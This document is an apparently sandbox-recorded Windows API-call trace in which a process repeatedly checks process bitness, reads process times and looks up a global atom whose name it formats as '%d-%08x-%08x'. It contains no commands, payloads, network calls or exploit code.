	[0143.124] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.124] CloseHandle (hObject=0x2dc) returned 1
	[0143.124] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.124] CloseHandle (hObject=0x2dc) returned 1
	[0143.124] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.124] CloseHandle (hObject=0x2dc) returned 1
	[0143.157] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.157] CloseHandle (hObject=0x2dc) returned 1
	[0143.157] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.157] CloseHandle (hObject=0x2dc) returned 1
	[0143.158] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.158] CloseHandle (hObject=0x2dc) returned 1
	[0143.158] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.158] CloseHandle (hObject=0x2dc) returned 1
	[0143.158] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.158] CloseHandle (hObject=0x2dc) returned 1
	[0143.158] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.158] CloseHandle (hObject=0x2dc) returned 1
	[0143.159] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.159] CloseHandle (hObject=0x2dc) returned 1
	[0143.159] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.159] CloseHandle (hObject=0x2dc) returned 1
	[0143.159] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.159] CloseHandle (hObject=0x2dc) returned 1
	[0143.159] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.159] CloseHandle (hObject=0x2dc) returned 1
	[0143.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.160] CloseHandle (hObject=0x2dc) returned 1
	[0143.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.160] CloseHandle (hObject=0x2dc) returned 1
	[0143.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.160] CloseHandle (hObject=0x2dc) returned 1
	[0143.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.160] CloseHandle (hObject=0x2dc) returned 1
	[0143.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.161] CloseHandle (hObject=0x2dc) returned 1
	[0143.161] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.161] CloseHandle (hObject=0x2dc) returned 1
	[0143.161] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.161] CloseHandle (hObject=0x2dc) returned 1
	[0143.161] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.161] CloseHandle (hObject=0x2dc) returned 1
	[0143.161] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.162] CloseHandle (hObject=0x2dc) returned 1
	[0143.162] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.162] CloseHandle (hObject=0x2dc) returned 1
	[0143.162] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.162] CloseHandle (hObject=0x2dc) returned 1
	[0143.162] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.162] CloseHandle (hObject=0x2dc) returned 1
	[0143.162] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.163] CloseHandle (hObject=0x2dc) returned 1
	[0143.163] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.163] CloseHandle (hObject=0x2dc) returned 1
	[0143.163] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.163] CloseHandle (hObject=0x2dc) returned 1
	[0143.163] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.164] CloseHandle (hObject=0x2dc) returned 1
	[0143.164] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.164] CloseHandle (hObject=0x2dc) returned 1
	[0143.164] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.164] CloseHandle (hObject=0x2dc) returned 1
	[0143.164] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.164] CloseHandle (hObject=0x2dc) returned 1
	[0143.164] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.165] CloseHandle (hObject=0x2dc) returned 1
	[0143.165] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.165] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0143.165] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0143.166] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.166] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0143.166] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.166] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0143.166] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0143.166] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0143.166] CloseHandle (hObject=0x2dc) returned 1
	[0143.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0143.167] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.167] CloseHandle (hObject=0x2dc) returned 1
	[0143.167] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.167] CloseHandle (hObject=0x2dc) returned 1
	[0143.167] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.167] CloseHandle (hObject=0x2dc) returned 1
	[0143.167] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.167] CloseHandle (hObject=0x2dc) returned 1
	[0143.168] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.168] CloseHandle (hObject=0x2dc) returned 1
	[0143.200] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.200] CloseHandle (hObject=0x2dc) returned 1
	[0143.201] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.201] CloseHandle (hObject=0x2dc) returned 1
	[0143.201] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.201] CloseHandle (hObject=0x2dc) returned 1
	[0143.201] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.201] CloseHandle (hObject=0x2dc) returned 1
	[0143.201] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.201] CloseHandle (hObject=0x2dc) returned 1
	[0143.202] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.202] CloseHandle (hObject=0x2dc) returned 1
	[0143.202] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.202] CloseHandle (hObject=0x2dc) returned 1
	[0143.202] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.202] CloseHandle (hObject=0x2dc) returned 1
	[0143.202] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.202] CloseHandle (hObject=0x2dc) returned 1
	[0143.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.203] CloseHandle (hObject=0x2dc) returned 1
	[0143.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.203] CloseHandle (hObject=0x2dc) returned 1
	[0143.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.203] CloseHandle (hObject=0x2dc) returned 1
	[0143.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.203] CloseHandle (hObject=0x2dc) returned 1
	[0143.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.204] CloseHandle (hObject=0x2dc) returned 1
	[0143.204] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.204] CloseHandle (hObject=0x2dc) returned 1
	[0143.204] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.204] CloseHandle (hObject=0x2dc) returned 1
	[0143.204] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.204] CloseHandle (hObject=0x2dc) returned 1
	[0143.205] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.205] CloseHandle (hObject=0x2dc) returned 1
	[0143.205] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.205] CloseHandle (hObject=0x2dc) returned 1
	[0143.205] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.205] CloseHandle (hObject=0x2dc) returned 1
	[0143.205] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.205] CloseHandle (hObject=0x2dc) returned 1
	[0143.206] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.206] CloseHandle (hObject=0x2dc) returned 1
	[0143.206] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.206] CloseHandle (hObject=0x2dc) returned 1
	[0143.206] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.206] CloseHandle (hObject=0x2dc) returned 1
	[0143.206] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.206] CloseHandle (hObject=0x2dc) returned 1
	[0143.207] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.207] CloseHandle (hObject=0x2dc) returned 1
	[0143.207] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.207] CloseHandle (hObject=0x2dc) returned 1
	[0143.207] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.207] CloseHandle (hObject=0x2dc) returned 1
	[0143.207] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.207] CloseHandle (hObject=0x2dc) returned 1
	[0143.208] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.208] CloseHandle (hObject=0x2dc) returned 1
	[0143.208] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.208] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0143.208] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0143.209] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.209] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0143.209] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.209] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0143.209] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0143.209] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0143.209] CloseHandle (hObject=0x2dc) returned 1
	[0143.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0143.210] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.210] CloseHandle (hObject=0x2dc) returned 1
	[0143.210] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.210] CloseHandle (hObject=0x2dc) returned 1
	[0143.210] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.210] CloseHandle (hObject=0x2dc) returned 1
	[0143.210] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.210] CloseHandle (hObject=0x2dc) returned 1
	[0143.211] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.211] CloseHandle (hObject=0x2dc) returned 1
	[0143.248] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.248] CloseHandle (hObject=0x2dc) returned 1
	[0143.248] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.248] CloseHandle (hObject=0x2dc) returned 1
	[0143.248] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.248] CloseHandle (hObject=0x2dc) returned 1
	[0143.249] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.249] CloseHandle (hObject=0x2dc) returned 1
	[0143.249] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.249] CloseHandle (hObject=0x2dc) returned 1
	[0143.249] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.249] CloseHandle (hObject=0x2dc) returned 1
	[0143.249] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.249] CloseHandle (hObject=0x2dc) returned 1
	[0143.250] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.250] CloseHandle (hObject=0x2dc) returned 1
	[0143.250] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.250] CloseHandle (hObject=0x2dc) returned 1
	[0143.250] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.250] CloseHandle (hObject=0x2dc) returned 1
	[0143.250] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.250] CloseHandle (hObject=0x2dc) returned 1
	[0143.250] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.251] CloseHandle (hObject=0x2dc) returned 1
	[0143.251] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.251] CloseHandle (hObject=0x2dc) returned 1
	[0143.251] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.251] CloseHandle (hObject=0x2dc) returned 1
	[0143.251] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.251] CloseHandle (hObject=0x2dc) returned 1
	[0143.251] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.252] CloseHandle (hObject=0x2dc) returned 1
	[0143.252] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.252] CloseHandle (hObject=0x2dc) returned 1
	[0143.252] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.252] CloseHandle (hObject=0x2dc) returned 1
	[0143.252] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.252] CloseHandle (hObject=0x2dc) returned 1
	[0143.253] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.253] CloseHandle (hObject=0x2dc) returned 1
	[0143.253] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.253] CloseHandle (hObject=0x2dc) returned 1
	[0143.253] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.253] CloseHandle (hObject=0x2dc) returned 1
	[0143.253] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.253] CloseHandle (hObject=0x2dc) returned 1
	[0143.253] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.254] CloseHandle (hObject=0x2dc) returned 1
	[0143.254] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.254] CloseHandle (hObject=0x2dc) returned 1
	[0143.254] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.254] CloseHandle (hObject=0x2dc) returned 1
	[0143.254] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.254] CloseHandle (hObject=0x2dc) returned 1
	[0143.255] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.255] CloseHandle (hObject=0x2dc) returned 1
	[0143.255] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.255] CloseHandle (hObject=0x2dc) returned 1
	[0143.255] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.255] CloseHandle (hObject=0x2dc) returned 1
	[0143.255] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.256] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0143.256] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0143.256] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.256] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0143.257] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.257] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0143.257] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0143.257] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0143.257] CloseHandle (hObject=0x2dc) returned 1
	[0143.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0143.257] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.257] CloseHandle (hObject=0x2dc) returned 1
	[0143.257] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.258] CloseHandle (hObject=0x2dc) returned 1
	[0143.258] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.258] CloseHandle (hObject=0x2dc) returned 1
	[0143.258] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.258] CloseHandle (hObject=0x2dc) returned 1
	[0143.258] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.258] CloseHandle (hObject=0x2dc) returned 1
	[0143.294] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.294] CloseHandle (hObject=0x2dc) returned 1
	[0143.294] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.294] CloseHandle (hObject=0x2dc) returned 1
	[0143.294] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.294] CloseHandle (hObject=0x2dc) returned 1
	[0143.295] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.295] CloseHandle (hObject=0x2dc) returned 1
	[0143.295] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.295] CloseHandle (hObject=0x2dc) returned 1
	[0143.295] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.295] CloseHandle (hObject=0x2dc) returned 1
	[0143.295] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.295] CloseHandle (hObject=0x2dc) returned 1
	[0143.295] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.296] CloseHandle (hObject=0x2dc) returned 1
	[0143.296] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.296] CloseHandle (hObject=0x2dc) returned 1
	[0143.296] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.296] CloseHandle (hObject=0x2dc) returned 1
	[0143.296] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.296] CloseHandle (hObject=0x2dc) returned 1
	[0143.296] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.296] CloseHandle (hObject=0x2dc) returned 1
	[0143.297] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.297] CloseHandle (hObject=0x2dc) returned 1
	[0143.297] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.297] CloseHandle (hObject=0x2dc) returned 1
	[0143.297] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.297] CloseHandle (hObject=0x2dc) returned 1
	[0143.297] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.298] CloseHandle (hObject=0x2dc) returned 1
	[0143.298] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.298] CloseHandle (hObject=0x2dc) returned 1
	[0143.298] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.298] CloseHandle (hObject=0x2dc) returned 1
	[0143.298] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.298] CloseHandle (hObject=0x2dc) returned 1
	[0143.298] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.299] CloseHandle (hObject=0x2dc) returned 1
	[0143.299] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.299] CloseHandle (hObject=0x2dc) returned 1
	[0143.299] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.299] CloseHandle (hObject=0x2dc) returned 1
	[0143.299] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.299] CloseHandle (hObject=0x2dc) returned 1
	[0143.300] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.300] CloseHandle (hObject=0x2dc) returned 1
	[0143.300] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.300] CloseHandle (hObject=0x2dc) returned 1
	[0143.300] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.300] CloseHandle (hObject=0x2dc) returned 1
	[0143.300] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.300] CloseHandle (hObject=0x2dc) returned 1
	[0143.300] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.301] CloseHandle (hObject=0x2dc) returned 1
	[0143.301] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.301] CloseHandle (hObject=0x2dc) returned 1
	[0143.301] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.301] CloseHandle (hObject=0x2dc) returned 1
	[0143.302] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.302] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0143.302] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0143.302] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
